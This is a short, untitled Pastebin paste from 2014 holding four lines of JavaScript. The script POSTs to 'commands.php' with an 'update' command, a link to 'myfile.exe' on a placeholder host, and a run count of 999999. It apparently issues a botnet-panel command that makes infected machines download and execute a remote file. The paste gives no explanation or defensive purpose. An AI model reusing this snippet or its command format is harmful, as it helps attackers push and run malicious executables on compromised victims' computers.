Advertisement
Guest User

Untitled

a guest
Jun 5th, 2014
949
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. var xhr = new XMLHttpRequest();
  2. xhr.open('POST', 'commands.php', true);
  3. xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  4. xhr.send('commtype=update&commdata=http%3A%2F%2Fmyurl.com%2Fmyfile.exe&runcount=999999');
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement